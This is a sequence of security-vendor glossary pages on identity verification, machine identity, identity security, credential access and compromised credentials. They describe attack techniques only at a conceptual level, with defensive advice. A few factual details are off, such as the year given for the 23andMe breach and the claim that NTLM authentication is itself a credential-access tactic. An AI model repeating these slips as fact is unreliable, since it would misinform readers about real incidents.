support throughout the identity verification process is vital. Organizations should offer resources such as FAQs, chatbots, and dedicated customer service teams to assist users. Prompt and effective support helps resolve issues quickly, enhancing the user experience and ensuring smooth verification . Diverse Methods Using a variety of verification methods enhances the security of user identities. Combining biometric authentication, document verification, and knowledge-based questions creates multiple layers of defense, making it harder for fraudulent attempts to succeed. This multi-faceted approach adapts to different user needs and provides robust security. Stay Updated Regular updates to the verification processes and tools are crucial to counter evolving cyber threats. Incorporating the latest technologies, such as AI and machine learning, helps detect and prevent sophisticated fraud attempts. Continuous improvement ensures that the verification system remains effective and resilient . Legal Adherence Adhering to regulations like KYC, AML, GDPR, and CCPA is mandatory. Compliance with these regulations not only avoids legal penalties but also builds trust with users by ensuring their data is handled ethically and responsibly. Regular audits and reviews of the verification processes help maintain compliance and identify areas for improvement . Routine Check-ups Conducting routine audits and evaluations of the identity verification system helps maintain its effectiveness. Regular check-ups can reveal vulnerabilities and inefficiencies, allowing organizations to make timely adjustments to enhance security and efficiency . Decentralized Solutions Exploring decentralized identity verification solutions can significantly enhance security and privacy. Technologies like blockchain offer secure and transparent ways to manage user identities, giving users more control over their personal information and reducing the risk of centralized data breaches . --- - Published: 2024-07-02 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/machine-identity/ The digital credentials (such as certificates, cryptographic keys, and service account accounts) assigned to devices, applications, and services, enabling trusted and authenticated machine-to-machine interactions. Machine identity refers to the unique identifiers and cryptographic keys used to authenticate and authorize machines (such as devices, applications, and services) within a network. Just as human identities are verified using usernames and passwords, machine identities use digital certificates and cryptographic keys to ensure secure communication and data exchange between machines. Machine identities are essential in today's cyber landscape due to the exponential growth of connected devices and services. The rise of the Internet of Things (IoT), cloud computing, and microservices architecture has significantly increased the number of machines within organizational networks. This rapid increase necessitates robust management of machine identities to maintain identity security, prevent unauthorized access, and ensure the integrity of communications. Importance of Machine Identity in Cybersecurity Machine identity plays a critical role in cybersecurity by: Ensuring Secure Communications: Machine identities use cryptographic keys and digital certificates to establish encrypted communication channels, protecting data from interception and tampering. Preventing Unauthorized Access: Proper management of machine identities ensures that only authorized machines can access sensitive data and resources. Maintaining System Integrity: By verifying the identity of machines, organizations can prevent the use of counterfeit or compromised machines that could disrupt operations or inject malicious code. Supporting Regulatory Compliance: Many industries have regulations that require secure machine-to-machine communications. Effective machine identity management helps organizations comply with these regulations and avoid penalties. Growth of Machine Identities vs. Human Identities The number of machine identities is growing at a much faster rate than human identities. With the proliferation of devices and the increasing adoption of cloud services, organizations are managing hundreds of thousands, if not millions, of machine identities. This growth outpaces the human population and underscores the need for effective machine identity management systems to secure and manage these identities. Types of Machine Identities Devices and Workloads Machine identities span a wide array of entities within an IT ecosystem. These include: Physical Devices: Traditional hardware like computers, smartphones, and IoT devices all require machine identities for secure communication and operation within a network. Virtual Machines: Instances running on cloud infrastructure also need unique identifiers to ensure secure provisioning, operation, and decommissioning. Containers: With the rise of containerized applications, each container instance needs a machine identity to secure its interactions and lifecycle operations. IoT Devices: These devices, ranging from smart home appliances to industrial sensors, require machine identities to ensure secure data transmission and control. Software Components Beyond physical and virtual devices, various software components also need machine identities: APIs: Application Programming Interfaces (APIs) are integral to modern software ecosystems. Machine identities ensure secure API calls and data exchanges between applications. Algorithms and Services: Machine learning models, microservices, and other backend services also need secure identities to protect their operations and interactions. Code: Code signing certificates provide assurance that software or code has not been altered, ensuring the integrity and authenticity of the code being executed. The Role of Machine Identity Management Security and Authentication Machine identity management ensures the security and integrity of machine-to-machine communications through the use of digital certificates and cryptographic keys. These tools verify the identity of machines, allowing them to establish secure connections and exchange data safely. By using encryption methods such as Transport Layer Security (TLS) and Secure Sockets Layer (SSL), machine identities prevent unauthorized access and protect sensitive information from being intercepted during transmission. Confidentiality, Integrity, Availability (CIA Triad) Machine identities play a crucial role in upholding the CIA triad in cybersecurity: Confidentiality: Ensures that data is accessible only to authorized machines. Digital certificates and encryption keys prevent unauthorized machines from accessing sensitive information. Integrity: Guarantees that the data exchanged between machines is not tampered with during transmission. Machine identities help detect and prevent data manipulation by verifying the source and destination of the data. Availability: Ensures that authorized machines have reliable access to necessary data and services. Proper management of machine identities helps maintain operational continuity by preventing outages due to expired or compromised certificates. Preventing Machine Identity Theft Machine identity theft occurs when cybercriminals forge or steal digital certificates and keys to impersonate legitimate machines. Effective machine identity management mitigates this risk by: Certificate Lifecycle Management: Regularly renewing and revoking certificates to prevent the use of expired or compromised credentials. Key Management: Securely storing and rotating cryptographic keys to minimize the risk of key theft or misuse. Monitoring and Alerts: Implementing systems to monitor certificate and key usage, and alerting administrators to any suspicious activities. Key Components of Machine Identity Management Public Key Infrastructure (PKI) Public Key Infrastructure (PKI) forms the backbone of machine identity management by providing the means to create, distribute, manage, and revoke digital certificates. PKI ensures secure communications and trusted identities through the use of: Digital Certificates: These are electronic documents that use a digital signature to bind a public key with an identity. X. 509 certificates are the most common type used for machine identities. Certificate Authorities (CAs): Trusted entities that issue and revoke digital certificates. They validate the identity of machines before issuing certificates, ensuring the authenticity of the identity. Revocation Lists: Lists maintained by CAs that contain revoked certificates, which are no longer trusted. This helps in preventing the use of compromised or expired certificates. Encryption and Key Management Effective encryption and key management are crucial for securing machine identities. Key management involves the generation, distribution, storage, rotation, and revocation of cryptographic keys. Important aspects include: Public and Private Keys: Asymmetric encryption involves a pair of keys—public and private. The public key encrypts data, which can only be decrypted by the corresponding private key. Secure Key Storage: Keys must be stored securely to prevent unauthorized access. Hardware Security Modules (HSMs) are often used to provide physical security for key storage. Key Rotation: Regularly updating cryptographic keys to mitigate the risk of key compromise. Automated key rotation policies help in maintaining security without disrupting operations. Automation and Orchestration Automation and orchestration play a significant role in managing the lifecycle of machine identities efficiently. Automated tools and platforms can handle tasks such as: Certificate Issuance and Renewal: Automating the issuance and renewal processes reduces human error and ensures that certificates are always up-to-date. Revocation and Replacement: Automated systems can quickly revoke compromised certificates and issue new ones, minimizing the window of vulnerability. Policy Enforcement: Automated tools can enforce policies for certificate and key management, ensuring compliance with security standards and regulatory requirements. Zero Trust Principles Zero Trust security models are increasingly being adopted to enhance machine identity management. The core idea is to trust nothing and verify everything, ensuring robust security by: Continuous Verification: Continuously verifying machine identities throughout their interactions, rather than assuming trust based on network location or previous verification. Least Privilege Access: Granting machines only the minimum access necessary for their function, reducing the potential impact of compromised identities. Micro-Segmentation: Dividing the network into smaller segments to contain potential breaches and limit unauthorized access. Compliance and Governance Maintaining compliance with regulatory requirements and governance standards is crucial for machine identity management. This involves: Regulatory Compliance: Adhering to industry-specific regulations that mandate secure machine-to-machine communications, such as GDPR, HIPAA, and PCI-DSS. Governance Frameworks: Implementing frameworks to manage and govern machine identities, ensuring that policies are enforced consistently and effectively. Audit Trails: Maintaining detailed logs of certificate and key usage to support audits and investigations. Challenges in Machine Identity Management Volume and Complexity Managing the volume and complexity of machine identities is one of the most significant challenges in modern IT environments. With the rapid proliferation of devices, containers, and microservices, organizations must handle thousands or even millions of machine identities. This growth necessitates scalable solutions capable of managing the dynamic and ephemeral nature of these identities. Proliferation of Devices: The number of connected devices, including IoT devices and virtual machines, is increasing exponentially. Each device requires a unique identity, adding to the management burden. Ephemeral Nature: Containers and virtual machines often have very short lifespans, requiring frequent issuance and revocation of certificates and keys. This transient nature complicates traditional identity management practices. Visibility and Control Maintaining visibility and control over machine identities across diverse and distributed environments is crucial for security and compliance. Centralized Management: Organizations struggle to implement centralized management systems that provide visibility into all machine identities. Without this, it's challenging to track and manage identities effectively. Inventory Management: Keeping an accurate inventory of all machine identities is essential for ensuring that expired or compromised certificates are promptly renewed or revoked. Automated tools can assist in maintaining this inventory and reducing the risk of oversight. Manual Processes Manual management of machine identities is time-consuming, error-prone, and often insufficient for meeting the demands of modern IT environments. Human Error: Manually tracking, issuing, and renewing certificates and keys increases the likelihood of errors, such as forgetting to renew a certificate or incorrectly configuring a key. Resource Intensive: Manual processes require significant time and resources from IT and security teams, diverting attention from other critical tasks. Compliance and Governance Adhering to regulatory requirements and maintaining governance over machine identities is an ongoing challenge for many organizations. Regulatory Requirements: Different industries have varying regulations that mandate secure machine-to-machine communication. Ensuring compliance with these regulations requires robust machine identity management practices. Governance Frameworks: Implementing governance frameworks that enforce policies and controls over machine identities is essential for maintaining security and compliance. This includes enforcing the principle of least privilege and ensuring that only authorized machines have access to sensitive data and resources. Best Practices to Overcome Challenges Organizations can adopt several best practices to address these challenges effectively: Automation: Utilizing automated tools for certificate issuance, renewal, and revocation can significantly reduce the risk of human error and improve efficiency. Centralized Management Platforms: Implementing centralized platforms for machine identity management provides comprehensive visibility and control, streamlining the management process. Regular Audits: Conducting regular audits of machine identities ensures that all certificates and keys are up to date and compliant with regulatory requirements. Machine identity management is a critical component of modern cybersecurity. As the number of machines continues to grow and IT environments become more complex, organizations must adopt robust, automated, and scalable solutions to manage and secure machine identities effectively. Embracing future trends and emerging technologies will help ensure that machine identities remain secure, enabling safe and reliable machine-to-machine communications. --- - Published: 2024-05-26 - Modified: 2025-08-22 - URL: https://www.silverfort.com/glossary/identity-security/ Identity Security is the discipline of protecting digital identities—human and non-human—from unauthorized access, abuse, and compromise. What is Identity Security? Identity Security is the discipline of protecting digital identities—human and non-human—from unauthorized access, abuse, and compromise. It ensures that only the right people (or machines) get access to the right resources at the right time, and for the right reasons. Unlike traditional identity and access management (IAM), which focuses on provisioning, authorization, and entitlements, identity security is proactive. It detects threats, enforces least privilege, prevents lateral movement, and fortifies every corner of your infrastructure. Think of IAM as your identity infrastructure and identity security as the protective layer securing your identity infrastructure and the identities within. Welcome to your definitive guide to Identity Security—a fast-evolving field that’s reshaping how organizations protect their most critical asset: identity. Whether you're a CISO, security analyst, or just curious about how the digital world keeps its gates locked (and who holds the keys), this glossary will take you from the fundamentals to futuristic best practices. Why does identity security matter? In a world where identities are the new perimeter, securing them is mission critical. Identities and IAM infrastructure need protection just like cloud infrastructure, endpoints, or networks. Identity-first attacks continue to be the weapon of choice for cyber-attackers. Traditionally, organizations attempt to solve this challenge with a patchwork network of controls and tools, but the tools are outdated, or are simply another management solution, not security. This approach leaves gaps & blind spots that go unprotected, leaving systems vulnerable to attack. Identity security is equally important to endpoint security or cloud security, which is why this category is extremely fast-moving and being rapidly adopted. According to the 2024 Verizon Data Breach Investigations Report, identity was the most implicated cause in reported breaches over the past year. Identity security exists to tackle this challenge. As organizations evolve beyond traditional networks to cloud-based infrastructures, SaaS applications, and hybrid working environments, identities have been given unprecedented levels of power. They consist of employees, third parties, and machines all freely navigating on-prem applications and resources to cloud infrastructures and SaaS applications, all from different devices and endpoints around the world. This is great news for organizations in search of flexibility and efficiency—but not so much for security teams responsible for protection, governance, and compliance. Today’s attackers are focused on identities. They’re stealing credentials, compromising legitimate accounts, and quietly navigating through environments to reach sensitive data. The problem? It’s harder than ever for organizations to maintain a clear view of who (or what) has access to what—and whether that access is appropriate or secure. Without identity security, your infrastructure is only as strong as its weakest login. Real-world impact: identity security in action Scenario With Identity Security Without Identity Security Compromised admin account Blocked with MFA + real-time enforcement Potential domain takeover Shadow service account Detected and removed automatically Credential theft + lateral movement Zero Trust strategy Enforced across all environments Policy gaps + privilege creep Regulatory audit Automated evidence and reporting Manual chaos and noncompliance   Who and what does identity security secure? Attackers don’t discriminate, and neither should your identity security. Every identity, regardless of type or privilege level, must be secured wherever they function in your estate, no matter what they’re doing. Identity security doesn’t end with individual identities: it’s about protecting your resources and environments too. Identities Why it matters Human users Your workforce, your first line of risk Non-human identities Service accounts, APIs, bots—often overlooked, heavily privileged Privileged users High value targets for attackers Third parties Vendors, contractors—risky by default AI agents Fast-acting, highly connected, and vulnerable Environments that must be covered by identity security include on-prem, cloud and multi-cloud, hybrid, and OT (Operational Technology), while resources range from command-line tools to modern cloud workloads, SaaS app, and legacy systems. As more and more companies design hybrid and on-prem environment, it becomes even more important for them to move away from a patchwork of identity tools and security controls, to a holistic identity security solution that acts as a security layer for your identity fabric. Identity and Access Management (IAM) vs. Identity Security: What’s the difference? IAM provides the foundation—Identity Security enhances and enforces it. Said another way, IAM is the infrastructure plane, and identity security is the control. IAM primarily focuses on provisioning, managing, and de-provisioning user identities and access permissions. It is essential for operational efficiency, regulatory compliance, and reducing administrative overhead. Identity security complements IAM by addressing the security gaps that IAM solutions often leave open. While IAM provides the foundational framework for managing identities and access, identity security ensures that these identities are protected from sophisticated cyber threats, such as credential theft, privilege escalation, and lateral movement. For a comprehensive security posture, organizations should integrate IAM with identity security measures. This integration provides a holistic approach to managing and securing identities, combining the strengths of IAM's access management with the proactive threat detection and response capabilities of identity security. An integrated approach like this helps organizations achieve robust protection against identity-based attacks while maintaining operational efficiency and compliance. Core elements of IAM include authentication, authorization, auditing, logging and monitoring, and elements of privileged access management. Authentication Authentication is the process of verifying that users are who they claim to be. Strong authentication mechanisms are essential to prevent unauthorized access. Multi-factor authentication (MFA) is a widely used method that requires users to provide two or more verification factors to gain access to a resource. These factors can include something the user knows (a password), something the user has (a security token), and something the user is (biometric verification). Authentication is often a key part of IAM solutions, however in some cases, advanced authentication tools that can protect legacy resources can be found in an identity security product. As such, authentication can sit in both the infrastructure and security layer. Authorization Authorization determines what an authenticated user is allowed to do. It involves setting and enforcing permissions and access controls based on the user’s role within the organization. Role-based access control (RBAC) is a common approach, assigning permissions to users based on their roles, which helps ensure that users have the minimum necessary access to perform their duties. Privilege management Privilege management focuses on controlling and monitoring elevated access rights to minimize risks associated with privileged accounts. This includes attempting to implement the principle of least privilege, where users are granted the minimum levels of access—or permissions—needed to perform their job functions. Privileged Access Management (PAM) solutions help manage and audit the use of privileged accounts, reducing the risk of misuse or compromise. PAM is typically considered part of both the infrastructure and security layer because it puts policy controls around privileged access and accounts. However, as organizations have evolved, the market has identified it needs to not just manage privileged access but to secure it. The market is also demanding easier ways to deploy privileged access security because legacy solutions are lengthy, time-consuming and often don’t end up delivering results. Audit, Logging and Monitoring Continuous audit, logging, and monitoring are vital for maintaining security and compliance. These activities involve tracking access and identity-related activities across systems to detect suspicious behavior, ensure policy compliance, and provide forensic evidence in the event of a security incident. Effective monitoring can help organizations identify and respond to potential threats in real time, thereby reducing the impact of security breaches. IAM infrastructure is the foundational identity management and basic access controls that identity security sits above and enhances. While IAM infrastructure incorporates some basic security features, like MFA, identity security provides a complete security layer that protects against unauthorized access, misuse of privileges, and identity-based attacks. With a seamless integration between these two complementary elements of enterprise identity, organizations can significantly reduce their attack surface and enhance their overall security posture. Feature Identity & Access Management (IAM) Identity Security Focus Authentication & provisioning Inline threat prevention & enforcement Visibility Limited to managed systems Continuous across all environments Enforcement Passive and limited Real-time, risk-aware Coverage Human identities Human + non-human identities, including service accounts Threat Detection Minimal Built-in, proactive Compliance reporting Manual Automated, real-time Critical real-world Identity Security use cases Use case #1: Protect privileged access Replace vaulting with JIT access, tiering, and policy enforcement. Traditional privilege management – centered on vaulting and password rotation – fails to provide real-time visibility and enforcement, leaving organizations exposed. Further, legacy PAM solutions leave blind spots and are difficult to deploy, making it difficult to protect privileged identities in a timely and holistic manner. Simply managing privileged accounts is not enough – concrete security controls must be in place to prevent privilege sprawl and unauthorized access. With identity security, protecting privileged access should look like: Automatically discovering and classifying all privileged accounts into different tiers based on actual usage Applying Just-In-Time (JIT) access to domain privileged accounts with a single click to eliminate privileges with no expiration Enforcing least privilege policies with virtual fencing to prevent unauthorized privilege escalation Eliminating dependency on vaulting and password rotation Use case #2: Stop lateral movement before it starts Use MFA on command-line interfaces, detect in real time, contain attacks instantly. Compromised credentials often lead to escalated privileges, reaching business-critical assets. Traditional detection and response capabilities lack visibility into all identities everywhere (from on-prem to the cloud, from human to NHI), allowing threats to spread undetected. To prevent breaches from escalating, organizations must stop unauthorized access before attackers embed themselves deeper and deeper. With identity security, stopping lateral movement looks like: Enforcing MFA on all access interfaces, including legacy systems, airgapped networks, IT/OT, and command-line interfaces such as PowerShell, PsExec, and WMI Implementing real-time attack containment detection capabilities to block malicious attempts instantly and isolate compromised accounts before privilege escalation can occur Utilizing AI to continuously analyze authentication attempts and identify anomalies, enabling proactive credential misuse prevention Integrating identity-first incident response to halt attacks immediately, without manual intervention Use case #3: Apply Zero Trust Enforce dynamic, risk-based access everywhere—cloud, SaaS, and on-prem. Identity is still the weakest link for many organizations, but traditional security tools struggle to enforce least privilege access across hybrid environments. Without universal enforcement and adaptive controls, organizations risk identity-driven breaches that undermine zero trust principles. With identity security, applying zero trust looks like: Extending zero trust to every identity by enforcing least-privilege access policies for all human and non-human identities, eliminating standing privileges Enforcing Just-In-Time (JIT) access enabling dynamic, time-bound access approvals to reduce exposure without disrupting workflows Continuously authenticating and monitoring access by verifying every access request with risk-based, adaptive controls that automatically adjust to evolving threats Unifying zero trust across all environments to secure access across cloud, SaaS, and on-prem resources—all without requiring complex integrations or additional agents Use case #4: Secure AD service accounts Auto-discover, monitor, and protect NHIs without disrupting workflows. AD service accounts often have elevated privileges, static credentials, and lack of direct oversight, making them a prime target for attackers. Without comprehensive visibility and control, these NHIs become an unchecked security risk, enabling credential theft and lateral movement. With identity security, protecting AD service accounts looks like: Automatically discovering and continuously monitoring all service accounts across Active Directory, including unmanaged and orphaned accounts Enforcing least privilege access with adaptive Zero Trust policies to block unauthorized authentication attempts and prevent lateral movement Securing service accounts at scale without relying on disruptive password resets, ensuring protection without operational downtime Analyzing authentication patterns to detect and block suspicious service account activity in real time Use case #5: Map the identity attack surface Uncover shadow admins, legacy protocols, and misconfigurations. Misconfigurations, legacy protocols, and excessive privileges open organizations up to risks like lateral movement and privilege escalation. Without proactive identity security posture management (ISPM), it becomes impossible to analyze and prioritize the most critical threats based on exploitation probability and impact-based scoring. With identity security, mapping the identity attack surface looks like: Automatically identifying vulnerabilities such as legacy authentication protocols, shadow admin accounts, and misconfigured domain settings that create security risks Continuously monitoring and hardening Active Directory, cloud IdPs, and federated authentication systems to... --- - Published: 2024-05-21 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/credential-access/ A stage in the cyberattack lifecycle where adversaries obtain legitimate credentials to impersonate users and bypass security controls. Credential access refers to the phase within the cyber attack lifecycle where an attacker obtains unauthorized access to a system's credentials. This critical step in the cyber attack chain, recognized within the MITRE ATT&CK framework, enables attackers to pose as legitimate users, bypassing traditional security measures designed to prevent unauthorized access. Credential access methods are as diverse as they are innovative, ranging from sophisticated phishing campaigns that deceive users into divulging their login credentials to brute force attacks that methodically guess passwords until the correct one is found. Additionally, exploitation of weak or default passwords is a widespread practice, resulting from an all-too-common oversight, as well as malware aimed at harvesting credentials directly from a user's computer. With the correct credentials in hand, an attacker can gain access to sensitive information, manipulate data, install malicious software, and create backdoors for future access, all while remaining undetected. These breaches have far-reaching implications, posing significant risks not only to the immediate security of data, but also to the integrity of the entire digital infrastructure of an organization. The Impact of Credential Access on Businesses Credential access ramifications extend far beyond the immediate breach of security systems; they permeate every facet of a business, causing financial, reputational, and operational damage. This section examines the extensive impact of credential access on organizations, highlighting the urgency and necessity for stringent security measures. Financial Losses: It is common for credential access attacks to result in direct financial losses. Malicious actors can use accessed credentials to siphon funds, execute fraudulent transactions, or divert financial transfers. Moreover, businesses face significant costs responding to breaches, including forensic investigations, system remediation, and legal fees. According to a report by the IBM Security and Ponemon Institute, the average cost of a data breach in 2020 was $3. 86 million, underscoring the economic threat posed by credential access. Reputational Damage: Trust is the cornerstone of customer relationships, and credential access breaches can irreparably damage this trust. News of a breach can lead to loss of customers, partners, and a decrease in stock market value. The long-term reputational damage can far exceed the immediate financial losses, affecting a company's prospects and growth. Rebuilding customer trust requires substantial effort and time, with no guarantee of full recovery. Operational Disruptions: Credential access can disrupt business operations, leading to downtime and loss of operations. Attackers can leverage accessed credentials to deploy ransomware, causing widespread system lockouts. In such scenarios, critical business processes are halted, leading to revenue loss and strained relationships with clients and stakeholders. The cascading effect of operational disruptions can be devastating, especially for small and medium-sized enterprises (SMEs) with limited resources. Identifying Vulnerabilities and Attack Vectors The key to preventing credential access is to understand the vulnerabilities and attack vectors that cybercriminals exploit. Identifying these weak points will allow cybersecurity and IT professionals to implement targeted measures to strengthen their defenses. In this section, we examine common vulnerabilities leading to credential access and outline strategies for mitigating them. Common Vulnerabilities Leading to Credential Access System Misconfigurations: Incorrectly configured systems offer easy entry points for attackers. Misconfigurations can include insecure default settings, unnecessary services running on critical systems, and improper file permissions. Regular audits and adherence to security best practices can mitigate these risks. Outdated Software: Vulnerabilities in software are frequently targeted by attackers to gain unauthorized access. Software that is not regularly updated with security patches presents a significant risk. Implementing a robust patch management process ensures that software vulnerabilities are promptly addressed. NTLM authentication is an example of a credential access tactic. Weak Authentication Methods: Reliance on single-factor authentication, especially with weak or reused passwords, significantly increases the risk of credential access. Enforcing strong password policies and multi-factor authentication (MFA) can dramatically enhance security. Admins with SPN: Service Principal Name (SPN) is the unique identifier of a service instance. Attackers can identify these accounts and request a service ticket, which is encrypted with the service account’s hash. This can then be taken offline and cracked, giving access to every resource this service account has access to. Role of Social Engineering and Phishing in Credential Access Social engineering attacks, particularly phishing, are primary methods used by attackers to gain unauthorized access to credentials. These attacks manipulate users into sharing their credentials or installing malware that captures keystrokes. Educating employees about the dangers of phishing and employing advanced email filtering solutions can reduce the effectiveness of these attacks. Emerging Trends and Techniques in Credential Access Attacks AI-Powered Phishing Campaigns: Malicious actors are leveraging artificial intelligence (AI) to craft more convincing phishing emails and messages, making it increasingly difficult for users to distinguish between legitimate and malicious communications. Credential Stuffing: Automated attacks that use previously breached credentials to gain access to accounts across different services. Implementing account lockout policies and monitoring for unusual login attempts can help mitigate these attacks. Credential Dumping: The process of obtaining account login credentials from a system, typically through unauthorized access. The primary aim of credential dumping is to gather valid user credentials (usernames and passwords or hashes) that can then be used for further attacks, such as lateral movement within the network, privilege escalation, or accessing restricted systems and data. Pass-the-Hash (PtH) and Pass-the-Ticket (PtT) Attacks: Techniques that allow attackers to authenticate to a remote server or service by using the underlying NTLM or Kerberos tokens without having access to the user's plaintext password. Employing strict access controls and monitoring abnormal authentication patterns are crucial in defending against these techniques. Best Practices for Preventing Credential Access To protect against the complex threats posed by credential access, organizations must adopt a proactive multi-layer approach to security, integrating both technological solutions and human-centric strategies. This section outlines best practices that are fundamental in preventing unauthorized access to credentials. Strong Password Policies and the Use of Password Managers Enforce Complex Passwords: Implement policies requiring passwords to be a mix of upper and lower case letters, numbers, and special characters. This complexity makes passwords harder to guess or crack. Regular Password Changes: Mandate periodic password updates while avoiding the reuse of old passwords to minimize the risk of exposure. Password Managers: Encourage the use of reputable password managers. These tools generate and store complex passwords for various accounts, reducing the reliance on easily guessable passwords and the risk of password reuse. Implementation of Multi-Factor Authentication (MFA) Layered Security: MFA adds an additional layer of security by requiring two or more verification methods to gain access to systems, significantly reducing the risk of unauthorized access. Diverse Authentication Factors: Utilize a combination of something the user knows (password), something the user has (security token, smartphone), and something the user is (biometric verification). Adaptive Authentication: Consider implementing adaptive or risk-based authentication mechanisms that adjust the required level of authentication based on the user's location, device, or network. Regular Security Audits and Vulnerability Assessments Identify Weaknesses: Conduct regular security audits and assessments to identify and address potential security risks in the system architecture, configurations, and deployed software. Penetration Testing: Simulate cyber attacks through penetration testing to evaluate the effectiveness of current security measures and uncover potential pathways for credential access. Employee Training and Awareness Programs Phishing Awareness: Educate employees about the dangers of phishing and social engineering attacks. Regular training sessions can help users recognize and appropriately respond to malicious attempts to acquire sensitive information. Security Best Practices: Foster a culture of cybersecurity awareness within the organization, emphasizing the importance of secure password practices, the proper handling of sensitive information, and the recognition of suspicious activities. Advanced Protective Measures To further strengthen their defenses against credential access, organizations must adopt advanced protective measures in addition to foundational security practices. To protect against increasingly complex cyber threats, these sophisticated strategies utilize cutting-edge technologies and methodologies. Zero Trust Architecture: Principles and Implementation Never Trust, Always Verify: Zero Trust is a security concept centered on the belief that organizations should not automatically trust anything inside or outside their perimeters and instead must verify anything and everything trying to connect to its systems before granting access. Microsegmentation: Break down security perimeters into small access group zones to maintain separate access for separate parts of the network. If one zone is compromised, this can help prevent an attacker from gaining access to other parts of the network. Least Privilege Access Control: Least Privilege ensures that users and systems have only the minimum levels of access—or permissions—needed to perform their tasks. This limits the potential damage from credential compromise. Role of Identity and Access Management (IAM) Solutions in Securing Credentials Centralized Credential Management: IAM solutions provide a centralized platform for managing user identities and their access rights, making it easier to enforce strong security policies and monitor for suspicious activities. Single Sign-On (SSO) and Federated Identity Management: Reduce password fatigue from different user account/password combinations, decrease the risk of phishing, and improve user experience by enabling single sign-on across multiple applications and systems. Behavioral Analytics and Machine Learning for Detecting Anomalous Access Patterns User and Entity Behavior Analytics (UEBA): Utilize advanced analytics to detect anomalies in user behavior that may indicate compromised credentials. By establishing a baseline of normal activities, these systems can flag unusual actions for further investigation. Machine Learning: Implement machine learning algorithms to continuously improve the detection of anomalous behaviors over time, adapting to the evolving tactics used by attackers. Credential Access in Cloud Environments Secure Cloud Configuration and Access Controls: Adopt cloud-specific security practices, including the use of cloud access security brokers (CASBs), to extend visibility and control over cloud services and ensure secure configuration. Cloud Identity Governance: Employ robust identity governance mechanisms to manage digital identities in cloud environments, ensuring that users have appropriate access rights based on their roles and responsibilities. Credential access is an ongoing battle, in which attackers and defenders are constantly evolving their strategies. Cybersecurity professionals must understand the dynamics of credential access methods, motivations, and markers to craft effective defenses. As we explore deeper into this topic, we will explore the vulnerabilities that lead to credential access, the consequences of such breaches, and the advanced strategies that organizations can employ to mitigate these risks. By deconstructing the concept of credential access and highlighting its role within the broader context of cyber threats, this section lays the groundwork for a comprehensive exploration of how businesses can protect themselves against this ever-present danger. --- - Published: 2024-05-21 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/compromised-credential/ Login details—such as usernames and passwords—that have been stolen or exposed and can be misused for unauthorized access or lateral movement attacks. Compromised credentials are when your login details have been stolen or accessed by unauthorized parties. Typically, compromised credentials include usernames, passwords, security questions, and other sensitive details used to verify a user’s identity and gain access to accounts and systems. The risks associated with compromised credentials are severe. Login credentials may be misused to impersonate legitimate users, gain unauthorized access to sensitive data and accounts, use them for lateral movement attacks, install malware, steal funds, and more. Compromised credentials are one of the most common attack vectors in data breaches. Common Causes of Compromised Credentials There are a few common ways credentials become compromised: Phishing attacks: Phishing emails containing malicious links or attachments are used to trick users into entering their login details on spoofed sites that capture their information. Keylogging malware: Malware installed on a user’s device tracks and records the keys pressed, capturing usernames, passwords, and other sensitive data. Data breaches: When a service is breached, user credentials and other personal information are often compromised and stolen. Attackers will then use the stolen credentials to access other accounts and systems. Reusing passwords: When a user uses the same password across many of their accounts, and a breach occurs where this user's credentials were compromised it can result in any one all other accounts using that password are also compromised. Social engineering: Skilled social engineers manipulate human psychology to convince targets to share sensitive login credentials either in person, over the phone, or online. In summary, compromised credentials pose a severe threat and proactive measures should be taken by both individuals and organizations to prevent and mitigate the risks associated with stolen login details. With compromised credentials, unauthorized access is often just a login away. How Credentials Get Compromised Credentials are stolen or compromised in several common ways: Phishing attacks: Phishing emails trick users into entering their login credentials on spoofed websites. The credentials are then stolen. Phishing is one of the leading causes of compromised credentials. Data breaches: When companies experience data breaches that expose customer data, login credentials are frequently stolen. The credentials can then be sold on the dark web and used to access other accounts. Weak passwords: Easy-to-guess or reused passwords make accounts an easy target. Once a password has been compromised on one site, attackers will try using the same password on other popular websites. Keylogging malware: Malware like keyloggers can be used to steal keystrokes and capture login credentials. The stolen data is then transmitted back to the attackers. Social engineering: Skilled social engineers manipulate human psychology to convince targets to share sensitive login credentials either in person, over the phone, or digitally. Some well-known examples of compromised credentials include: RockYou2024 Breach: This incident involved the leakage of a staggering 10 billion credentials, making it one of the largest password dumps in history. Although the sheer volume of data is alarming, experts have pointed out that much of the data might not be immediately useful for attackers due to the presence of outdated or irrelevant information. However, the breach serves as a stark reminder of the dangers of password reuse and the necessity for strong authentication practices, including multi factor authentication (Daily Security Review). Microsoft Executive Accounts Breach: Early in 2024, a Russia-aligned threat actor managed to breach Microsoft’s corporate email accounts, including those of senior leadership and cybersecurity teams. This breach was facilitated by exploiting a legacy account that lacked multifactor authentication. The attackers were able to exfiltrate sensitive email communications between Microsoft and various U. S. federal agencies (CRN). Okta Data Breach: In October 2023, Okta, a leading identity services provider, disclosed that a threat actor had accessed its customer support system using stolen credentials. The attack allowed unauthorized access to customer support cases, underlining the risks associated with compromised credentials even in systems designed to manage and secure user identities In 2019, DNA testing company 23andMe announced that some customer data, including login info, had been accessed due to a security breach. In 2018, Nintendo's Nintendo Network suffered a breach that compromised over 300,000 accounts. Login credentials were stolen and used to make fraudulent purchases. In 2016, a data breach at PayPal exposed over 1. 6 million customer records, including login credentials, names, email addresses, and more. Compromised credentials are a serious threat and protecting accounts requires vigilance around phishing, strong unique passwords, multi-factor authentication and monitoring accounts regularly for signs of fraud. With care and awareness, the risks can be reduced. The Dangers of Compromised Credentials Compromised credentials pose serious risks to organizations and individuals. Once login credentials have been stolen, attackers can access sensitive data and systems, enabling a range of malicious activity. According to Verizon's 2020 Data Breach Investigations Report, over 80% of hacking-related breaches leveraged stolen and/or weak passwords. The impacts of these credential-based attacks include: Data breaches: With access to accounts and systems, attackers can steal confidential data like customer information, employee records, and intellectual property, using credential stuffing attacks. Financial loss: Malicious actors may transfer funds, make unauthorized purchases, or commit payment fraud using stolen account access. Reputational harm: Data breaches and account takeovers can damage customer trust and brand reputation. Account takeover: Attackers can hijack online accounts for spam, fraud, and other malicious activities. Compromised social media accounts are commonly abused to spread malware and misinformation. While individuals should use unique, complex passwords and enable multi-factor authentication whenever possible, organizations must also implement strong access policies and security controls. Frequent password changes, account monitoring, and employee education can help reduce the risks associated with compromised credentials. Detecting Compromised Credentials To detect compromised credentials, organizations employ User Entity and Behavioral Analytics (UEBA) systems which monitor user activity and behaviors to identify anomalies. UEBA solutions analyze log data from multiple sources like network devices, operating systems, and applications to create a baseline of normal user activity. Any deviations from established 